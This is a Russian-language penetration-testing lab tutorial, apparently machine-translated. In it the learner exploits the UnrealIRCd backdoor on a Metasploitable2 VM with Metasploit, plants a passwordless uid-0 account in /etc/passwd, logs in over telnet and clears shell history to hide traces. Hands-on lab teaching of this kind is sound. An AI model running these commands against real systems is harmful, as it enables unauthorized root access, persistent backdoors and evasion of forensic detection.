💡 Этот учебник переведен с английского с помощью ИИ. Чтобы просмотреть оригинал, вы можете перейти на английский оригинал
В этом практическом занятии мы научимся создавать обратную дверь (backdoor) и удалять следы после успешного получения доступа к целевой машине в ходе пенетрационного атаки. Сценарий настроен в среде LabEx, где мы будем использовать терминал Kali для эксплойта уязвимостей на целевой машине Metasploitable2, получения root-доступа, создания обратной двери для последующего доступа и удаления любых следов, оставшихся в процессе атаки.
На этом шаге мы воспользуемся уязвимостью Unreal Ircd для получения root-доступа на целевой машине.
Теперь вы запустите машину-атакующую (контейнер Kali Linux) и целевую машину (виртуальную машину Metasploitable2) для эксперимента.
sudo virsh start Metasploitable2Подождите, пока целевая машина запустится, это может занять от 1 до 3 минут.
ping 192.168.122.102Нажмите Ctrl+C, чтобы остановить отправку пингов.
docker run -ti --network host b5b709a49cd5 bashping 192.168.122.102Нажмите Ctrl+C, чтобы остановить отправку пингов.
Теперь и машина-атакующая, и целевая машина запущены, и вы можете приступить к пенетрационному тестированию.
Примечание: Если вы случайно выйдете из текущего сеанса bash, контейнер Kali автоматически остановится. Вы можете снова выполнить команду docker run -ti --network host b5b709a49cd5 bash на хост-машине, чтобы запустить новый контейнер Kali и войти в bash для продолжения эксперимента.
service postgresql start
msfdb init
cd ~
msfconsoleЭто запустит службу базы данных PostgreSQL, инициализирует базу данных и запустит консоль Metasploit Framework (msfconsole) для дальнейших операций.
search unreal_ircdunix/irc/unreal_ircd_3281_backdoor:use exploit/unix/irc/unreal_ircd_3281_backdoorset RHOST 192.168.122.102exploitwhoamiВы должны увидеть, что вы получили root-доступ на целевой машине.
Нажмите Ctrl+D, чтобы выйти из консоли Metasploit, а затем начните проверку
Теперь, когда мы получили root-доступ, давайте создадим обратную дверь для последующего доступа к целевой машине.
Во - первых, если вы не находитесь в консоли Metasploit, вы должны запустить консоль Metasploit:
cd ~
msfconsoleЗатем проверьте системную информацию:
uname -aНайдите расположение bash для пользователя root:
cat /etc/passwdСоздайте учетную запись для обратной двери без пароля:
echo 'shiyanlou1234::0:0::/:/bin/sh' >> /etc/passwdПроверьте создание учетной записи для обратной двери:
cat /etc/passwdВ выводе вы должны увидеть новую учетную запись shiyanlou1234.
Откройте новый терминал и подключитесь к целевой машине с использованием учетной записи для обратной двери:
telnet 192.168.122.102При запросе введите имя пользователя shiyanlou1234.
Проверьте текущего пользователя:
whoamiВы должны увидеть, что вы вошли в систему как пользователь обратной двери.
Нажмите Ctrl+D, чтобы выйти из консоли Metasploit, а затем начните проверку
После получения доступа и создания обратной двери (backdoor) важно удалить все следы, оставшиеся в процессе атаки, чтобы избежать обнаружения.
Во - первых, если вы не находитесь в консоли Metasploit, вы должны запустить консоль Metasploit:
cd ~
msfconsoleОдним из распространенных способов удаления следов является удаление истории команд. История хранится в файле .bash_history. Вы можете очистить историю с помощью следующей команды:
history -cДля очистки файла .bash_history вы можете найти его расположение с помощью команды find:
find / -name.bash_historyНажмите Ctrl+D, чтобы выйти из консоли Metasploit, а затем начните проверку
В этом практическом занятии мы научились получать root-доступ на целевой машине, используя уязвимость Unreal Ircd, создавать учетную запись для обратной двери (backdoor) для последующего доступа и удалять следы, оставшиеся в процессе атаки. Этот практический опыт поможет вам понять методы, используемые атакающими для сохранения постоянного доступа и скрытия своих следов после успешной пенетрационной атаки.